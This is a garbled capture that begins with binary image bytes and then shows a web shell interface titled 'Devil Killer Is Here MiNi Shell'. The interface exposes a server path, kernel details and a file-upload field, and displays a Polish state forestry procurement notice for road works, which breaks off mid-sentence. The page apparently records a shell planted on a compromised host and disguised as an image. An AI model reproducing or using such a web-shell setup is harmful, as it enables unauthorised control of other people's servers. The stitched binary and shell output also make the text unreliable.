JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250606/0026597901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dojazdu pożarowego nr 9 i drogi leśnej na terenie leśnictwa Chłopiny i Smoliny – etap VI (km 0+000,00 – km 0+950,00) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Różańsko</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Nadleśnictwo Różańsko</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210238288</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piołunek 1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Różańsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-311</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 760 18 14</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rozansko@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rozansko.szczecin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka Leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dojazdu pożarowego nr 9 i drogi leśnej na terenie leśnictwa Chłopiny i Smoliny – etap VI (km 0+000,00 – km 0+950,00) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3b0c8822-44b3-448d-ab3c-a03877686bde</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00265979</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00245612/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa dojazdu pożarowego nr 9 i drogi leśnej na terenie leśnictwa Chłopiny i Smoliny</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3b0c8822-44b3-448d-ab3c-a03877686bde <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia („Platforma”), która jest dostępna pod adresem: https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W-ca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu „Wykonawca” na Platformie.Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy, w tym minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy oraz informacje dotyczące specyfikacji połączenia określa „Regulamin korzystania z Platformy e-Zamówienia”, dostępny pod adresem:<br/>https://ezamowienia.gov.pl/pl/regulamin/oraz informacje zamieszczone na stronie Platformy w zakładce „Centrum Pomocy”.Przeglądanie i pobieranie publicznej treści dokumentacji dotyczącej niniejszego postępowania nie wymaga posiadania konta na Platformie ani logowania.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowanie) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie(Dz.U.z 2020 r., poz. 2452).Wymagane w SWZ informacje, oświadczenia lub dokumenty, inne niż wymienione w §2 ust. 1 rozporządzenia wskazanego w pkt 10.6. SWZ, przekazywane w postępowaniu sporządza się w postaci elektronicznej:a)w formatach danych określonych w przepisach rozporządzenia w sprawie Krajowych Ram Interoperacyjności(i<br/>przekazuje się jako załącznik), lub b)jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej(np. w treści „Formularza do komunikacji”).Ofertę oraz oświadczenia, składane na podstawie art. 125 ust. 1 PZP,sporządza się, pod rygorem nieważności, w formie elektronicznej(tj.w postaci elektr.opatrzonej kwalifik.podpisem elektr.)Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.Komunikacja w postępowaniu(z wyłączeniem składania ofert – sposób złożenia oferty opisany jest w pkt 10.10. SWZ), odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze”(„Formularze do komunikacji”).Za pośrednictwem „Formularzy do komunikacji”odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.„Formularze do komunikacji” umożliwiają, również dołączenie załącznika do przesłanej wiadomości (przycisk „dodaj załącznik”).W przypadku zał., które są zgodnie z PZP lub rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie(Dz. U. z 2020 r., poz. 2452) opatrzone kwalifik. podpisem elektr.,mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawców wspólnie ubiegających się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu(wewnętrzny, zewnętrzny)dodaje się do przesłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu(typ zewnętrzny)lub dokument z wszytym podpisem (typ wewnętrzny).Możliwość korzystania w postępowaniu z„Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platf.oraz zalogowania się na Platformie. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia(w szczególności SWZ)wystarczające jest posiadanie tzw. konta uproszczonego na Platformie.Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu do Platformy w podglądzie postępowania w zakładce „Komunikacja”. C.d. w informacjach dodatkowych</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych) (Dz. Urz. UE L119 z 04 maja 2016 r., str. 1 – „RODO”) Z-cy informuje, iż administratorem danych osobowych jest Nadleśniczy Nadleśnictwa Różańsko. Administrator wyznaczył Inspektora Ochrony Danych, pana Sebastiana Strzech, z którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@comp-net.pl lub telefonicznie wybierając numer +48 63 240 65 32. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.Z-cy udostępnia dane osobowe, o których mowa w art. 10RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IXPZP, do upływu terminu do ich wniesienia.Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art.255-256 i 310 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego Archiwizacji. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP, a także na podstawie ustawy o dostępie do informacji publicznej.Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 10 lat od dnia zakończenia umowy w sprawie zamówienia publicznego.Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne i konsultingowe.Osoba, której dotyczą pozyskane w związku z<br/>prowadzeniem niniejszego postępowania dane osobowe, ma prawo:dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Z-cego, z uprawnienia, o którym mowa wart. 15 ust. 1 -3 RODO, Zamawiający może żądać od osoby występującej z żądaniem dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia publicznego,do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego załączników,do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust.2RODO, przy czym prawo do ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO nie ogranicza przetwarza danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. W przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa wart. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Z-cy nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO.Pozostałe informacje w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.2.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 666059,87 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres rzeczowy przedmiotu zamówienia obejmuje roboty budowlane polegające na przebudowie dojazdu pożarowego nr 9, o długości 2.454,18 m, obejmującej III i V etap realizacji inwestycji (zgodnie z załączonym projektem), o nawierzchni z kruszywa, wraz z jej wyposażeniem w postaci zjazdów na drogi wewnętrzne i mijanek o nawierzchni z kruszywa oraz placów składowych o nawierzchni z płyt betonowych.<br/> Szczegółowy Opis Przedmiotu Zamówienia stanowi:<br/>1. Specyfikacja Techniczna Wykonania i Odbioru Robót - Załącznik nr 10 do SWZ,<br/>2. Przedmiar robót – Załącznik nr 2.1. oraz 2.2. do SWZ,<br/>3. Projekt architektoniczno - budowlany – Załącznik nr 11 do SWZ,<br/>4. Inwestycja położona jest w powiecie gorzowskim, gminie Lubiszyn na obszarze<br/>działek ewidencyjnych:<br/>Obr. Gajewo 870, 458, 851, 638/8, 868, 637/3, 850, 865, 636/4, 849, 861, 635/4,<br/>848, 857, 634/6, 847, 609/1, 856, 634/5, 853, 852, 633/5;<br/>Obr. Ściechowek 683, 632/3, 682, 681, 631/3, 680, 679, 630/3, 678, 629/3, 677,<br/>676, 675, 628/3, 674, 673, 672/3, 672, 671, 626/3, 670, 668, 625/5, 669, 667,<br/>624/3, 666, 664, 623/3, 689, 648/3, 688, 687, 647/4, 686. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45232452-5 - Roboty odwadniające</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował<br/>się następującymi kryteriami oceny ofert: cena - 60%, okresu gwarancji jakości oraz rękojmi za wady - 40%.<br/>W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>C = (Cn/Co) x 100 pkt x 60 %<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena brutto podana w Ofercie (załącznik nr 2 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium „Okres gwarancji jakości oraz rękojmi za wady” ocena ofert zostanie dokonana w następujący sposób:<br/>Okres gwarancji jakości oraz rękojmi za wady w badanej ofercie<br/>G/R = ------------------------------------------------------ x 100 pkt x 40%<br/>Najdłuższy okres gwarancji jakości oraz<br/>rękojmi za wady<br/>W ramach kryterium „Okres gwarancji jakości oraz rękojmi za wady” ocenie podlegać będzie okres gwarancji wyrażony w<br/>miesiącach, zadeklarowany przez Wykonawcę w Ofercie (załącznik nr 2 do SWZ). Zamawiający wskazuje, że minimalny okres<br/>gwarancji jakości wynosi 60 miesięcy, a okres rękojmi będzie równy okresowi gwarancji. Wykonawca może zaoferować dłuższy<br/>okres gwarancji, nie dłuższy jednak niż 72 miesiące. Oferta z najdłuższym okresem gwarancji jakości otrzyma najwyższą liczbę<br/>punktów. Ocenie poddana zostanie wartość wskazana w Ofercie stanowiącej załącznik nr 2 do SWZ. Brak wskazania w Ofercie<br/>okresu gwarancji jakości i rękojmi za wady jest równoznaczny z udzieleniem gwarancji jakości na okres 60 miesięcy. W przypadku<br/>zaoferowania gwarancji jakości na okres dłuższy niż wskazany okres maksymalny, Zamawiający na potrzeby oceny ofert w ramach<br/>kryterium oceny ofert „Okres gwarancji jakości oraz rękojmi za wady” uzna okres maksymalny. Na potrzeby realizacji umowy<br/>Wykonawca<br/>związany będzie okresem gwarancji oraz rękojmi za wady faktycznie zadeklarowanym w swojej ofercie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości i rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku zdolności do występowania w obrocie gospodarczym.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>3) sytuacji ekonomicznej lub finansowej.<br/>Warunek w odniesieniu do sytuacji ekonomicznej lub finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową o wartości nie mniejszej niż 1 000 000,00 zł (słownie złotych: jeden milion złotych 00/100).<br/>4) zdolności technicznej lub zawodowej.<br/>a) Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat od dnia w którym upływa termin składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej dwie roboty budowlane (przez robotę budowlaną rozumie się wykonywanie prac na podstawie 1 umowy) polegające na budowie, przebudowie, remoncie bądź utrzymaniu nawierzchni drogowych na kwotę nie niższą niż 500 000,00 zł brutto każda.<br/>b) Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do potencjału technicznego,<br/>c) Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą pełniącą funkcję kierownika budowy, posiadającą uprawnienia budowlane* do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej lub konstrukcyjno-budowlanej w co najmniej ograniczonym zakresie.<br/>*Uprawnienia wydane zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej<br/>obowiązujących przepisów lub odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a<br/>oraz innych przepisów ustawy Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 6.1. i 6.4. Zamawiający działając na podstawie art. 274 ust. 1 PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od 